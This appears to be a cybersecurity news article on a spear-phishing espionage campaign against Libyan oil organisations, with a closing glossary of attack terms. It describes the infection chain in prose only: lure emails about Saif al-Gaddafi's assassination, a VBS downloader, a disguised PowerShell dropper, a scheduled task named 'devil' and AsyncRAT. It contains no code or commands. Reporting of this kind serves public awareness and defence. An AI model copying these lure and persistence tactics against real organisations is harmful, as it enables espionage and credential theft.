Espionage in the Oil Fields: Inside the Shadowy Cyber Campaign Targeting Libya’s Lifeblood

It began with a chilling subject line: “Leaked CCTV footage – Saif al-Gaddafi’s assassination.gz.” For Libyan employees at a national oil refinery, the email seemed urgent and credible. But behind the lure was a meticulously crafted cyber espionage operation - one that would quietly infiltrate critical infrastructure at a time when the world’s energy markets were already on edge.

Inside the Attack: How Hackers Exploited Chaos

Between late 2025 and early 2026, a series of targeted cyberattacks swept through key Libyan organizations. The attackers’ focus was clear: compromise entities central to Libya’s oil production, a sector critical not only to the nation but to the global energy supply chain. With output peaking at 1.37 million barrels per day, Libya’s oil has never been more vital - or more vulnerable.

The operation started with customized spear-phishing emails, cleverly referencing current events to lure victims. One especially potent bait: a document purporting to show leaked footage of Saif al-Gaddafi’s assassination - a real and recent event. These emails carried malicious Visual Basic Script (VBS) files with names like “video_saif_gadafi_2026.vbs,” downloaded from public file-sharing sites. Once executed, these scripts triggered a stealthy infection chain.

The VBS downloader fetched a PowerShell dropper disguised as an image. This dropper created a Windows scheduled task - named “devil” - that would persistently launch the final payload: AsyncRAT. This open-source remote access tool is a hacker’s Swiss Army knife, capable of logging keystrokes, stealing credentials, capturing screens, and executing commands. Its flexibility and public availability make it a favorite for both cybercriminals and state-linked groups.

Investigators found evidence of attackers maintaining access for months, with activity logged in multiple bursts. The campaign’s persistence points to a methodical, intelligence-driven motive. Notably, samples of the malware - often named after Libyan themes - were uploaded to VirusTotal as early as April 2025, indicating long-term planning and broad targeting.

Global Ripples and Unanswered Questions

While AsyncRAT is used by everyone from lone hackers to nation-state operatives, the campaign’s sophistication and timing suggest possible state involvement - though conclusive attribution remains elusive. With the Gulf region’s tensions threatening global oil flows, intelligence on alternative producers like Libya is increasingly valuable. Security experts warn that cyber espionage is now a frontline tactic in geopolitical maneuvering, and no sector is immune.

For now, the Libyan campaign is a stark reminder: in times of political turmoil, cyber attackers move fast to exploit chaos, targeting the world’s most vital industries while the world looks elsewhere.

WIKICROOK

• Spear: Spear phishing is a targeted cyberattack using personalized emails to trick specific individuals or organizations into revealing sensitive information.
• Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
• Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
• Dropper: A dropper is a type of malware that secretly installs additional malicious programs on an infected device, helping attackers bypass security measures.
• Credential theft: Credential theft occurs when hackers steal usernames and passwords, often via phishing or data breaches, to illegally access online accounts.